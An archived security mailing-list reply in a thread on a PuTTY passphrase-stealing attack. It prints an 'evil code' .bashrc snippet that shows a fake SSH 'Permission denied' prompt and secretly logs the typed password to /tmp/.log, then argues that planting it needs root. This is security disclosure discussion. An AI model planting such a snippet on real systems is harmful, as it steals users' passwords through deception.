lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Wed, 2 Jun 2010 13:29:40 +0530
From: rapper crazy <rappercrazzy@...il.com>
To: Rob Fuller <jd.mubix@...il.com>
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Re: PuTTY private key passphrase stealing attack

all controls like MOTD can be bypassed ...

=========edited script=====
# evil code
mIP=`/sbin/ifconfig | grep x.x.x | cut -d ':' -f2- | cut -d ' ' -f1`
mUn=`whoami`
mSttyVal=`stty -g`
echo -en "Permission denied, please try again.\n"
echo -en "$mUn@...P's password:"
stty -echo
read password
echo -en "username: $mUn \t\t password: $password\n" >>/tmp/.log
echo -en "\n"
stty $mSttyVal
==================end snippet========


Apart from this, we already need to have root access to replace any .bashrc
file ... this is not really an attack but a social engineering attack ....
if we had root access we could attach sshd to the strace and get any
password etc all details ....

Thanks
RapperC

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ